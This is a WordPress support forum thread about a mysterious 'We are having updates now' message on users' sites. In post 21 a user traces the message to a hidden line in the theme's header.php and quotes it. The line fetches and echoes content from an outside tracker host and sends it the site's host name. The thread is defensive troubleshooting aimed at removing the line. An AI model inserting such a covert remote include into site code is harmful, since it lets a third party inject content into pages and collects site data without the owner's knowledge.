WordPress.org

Ready to get started?Download WordPress

Forums

How to remove the "Please get back shortly" message when updating? (24 posts)

  1. marcosamaral
    Member
    Posted 3 years ago #

    I'm using the new WP 3.1, and I've noted that sometimes, a message appears on my wp pages and posts:

    "We are sorry
    We are having updates now.

    Please get back shortly."

    This message, when it appears, removes the background image. Clicking a link to another page/post makes the message disappear, once the page reloads.

    How can I remove this message from my WP? I use the WP to publish news. So we're updating everytime. This message is really bugging us, and all the readers too.

    Sorry for my bad english, BTW.

  2. Check to make sure you don't have a file called .maintenance in the same level as your wp-config.php file. If you do, delete it :)

  3. jtata
    Member
    Posted 3 years ago #

    I have the same problem with:

    "We are sorry We are having updates now.
    Please get back shortly."

    There is no file .maintenance as far as i can see. Could you please be more specific where to find it.

    Is there any other solution? Its really annoying.

  4. esmi
    Forum Moderator
    Posted 3 years ago #

    It should be in your root WordPress file. Make sure that your FTP (or file management application) is configured to show all files as some application may hide files that are prefixed with . by default.

  5. jtata
    Member
    Posted 3 years ago #

    I can see the .htaccess which also starts with "." but may not locate .maintenance file. However the "We are sorry We are having updates.." is still visible. Please advice.

  6. marcosamaral
    Member
    Posted 3 years ago #

    I haven't found any .maintenance file.

    However, I was loooking into some files (like wp-config.php and wp-settings.php) and found this on wp-settings.php's line 49:

    // Check if we're in maintenance mode.
    wp_maintenance();

    Maybe it's something related? Maybe putting two slashes before "wp_maintenance();" can be a solution?

  7. 123milliseconds
    Member
    Posted 3 years ago #

    // Check if we're in maintenance mode.
    wp_maintenance();

    No that only checks; does not put you into maint mode

  8. vizzitor
    Member
    Posted 3 years ago #

    Have you found the solution? It happened to me also this evening. I did not updated the engine, did not do anything but the same message appeared. But there is no .maintenance file to delete nor can I find any of the text or code in the files, I even deep searched for the HEX value of new grey background color it set but no hits.
    PLS Heeeeeelp. have you found the solution?

  9. brendymullan
    Member
    Posted 3 years ago #

    I also got this error tonight! Its hijacked my homepage and there is no .maintenance file! I can't find where its coming from, even disabled all modules! Vizzitor what theme are you using?

  10. brendymullan
    Member
    Posted 3 years ago #

    I get the feeling its a plugin thats gone bad, i doubt the wordpress team use bad english like that. Going to try reinstall all my plugins.

  11. esmi
    Forum Moderator
    Posted 3 years ago #

    That's not a WordPress maintenance message! Have you tried:

    - deactivating all plugins to see if this resolves the problem. If this works, re-activate the plugins one by one until you find the problematic plugin(s).

    - switching to the Twenty Ten theme to rule out any theme-specific problems.

    - resetting the plugins folder by FTP or PhpMyAdmin. Sometimes, an apparently inactive plugin can still cause problems.

  12. vizzitor
    Member
    Posted 3 years ago #

    I am using a custom modified theme, not sure what was the original. But I am using it for months with no problem.

    The plugins I have installed.
    Which ones do we have in common?

    Add image_src Meta Tag (this was added lately)
    Akismet
    fbLikeButton
    Google XML Sitemaps
    SEO Ultimate
    Tumblr Widget
    W3 Total Cache
    WP-PageNavi

    I am trying to turn off all the plugins first.

  13. vizzitor
    Member
    Posted 3 years ago #

    This is how it looks like:
    http://www.pto.hu/post/1/2520
    it also changed my background

    Fortunately I can access the admin at least.

  14. brendymullan
    Member
    Posted 3 years ago #

    I swapped to the original theme and the errors gone, so must be theme specific? I find it hard to believe we all have the same theme... I'm not sure of my original name, you got a link to yours vizzitor?

  15. brendymullan
    Member
    Posted 3 years ago #

    Oh just saw your post, that theme is completely different to mine! Only plugin i use that you also use is Akismet. And Ive reinstalled and disabled it with no luck!

  16. vizzitor
    Member
    Posted 3 years ago #

    And brendymullan, if you change back from the safe theme to your own theme the message reappears again, or is it gone forever?

  17. esmi
    Forum Moderator
    Posted 3 years ago #

  18. brendymullan
    Member
    Posted 3 years ago #

    If I change to the default wordpress theme and back its still the same.

  19. brendymullan
    Member
    Posted 3 years ago #

    Ah Ha! This look familiar guys?

    http://www.netanalytic.com/

  20. esmi
    Forum Moderator
    Posted 3 years ago #

    @brendymullan & vizzitor: What theme are you using? Where did you get the theme from?

  21. brendymullan
    Member
    Posted 3 years ago #

    To solve the problem, open the "header.php" and search for the line

    <?php error_reporting(0); echo @file_get_contents("http://netanalytic.com/linkadmin/tracker/tracker.php?h=".$_SERVER['HTTP_HOST']."&id=28");?>

    There may be some variation, just search for netanalytic if you cant find that exact line, and its located just after the </head> tag.

    Remove it and bam! No more annoying message!!

  22. vizzitor
    Member
    Posted 3 years ago #

    Thanks a lot brendymullan! I would have never found it!
    I removed and it works fine now!

  23. brendymullan
    Member
    Posted 3 years ago #

    No problem vizzitor! It was showing because the netanalytic service was down. For clarification for anyone else the header.php will be located in your theme's directory.

  24. itanum
    Member
    Posted 2 years ago #

    Thanks a lot brendymullan!

    I've been looking for a solution desperately. At this point I would have never sought. Thank you thank you thank you. where can I donate?

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.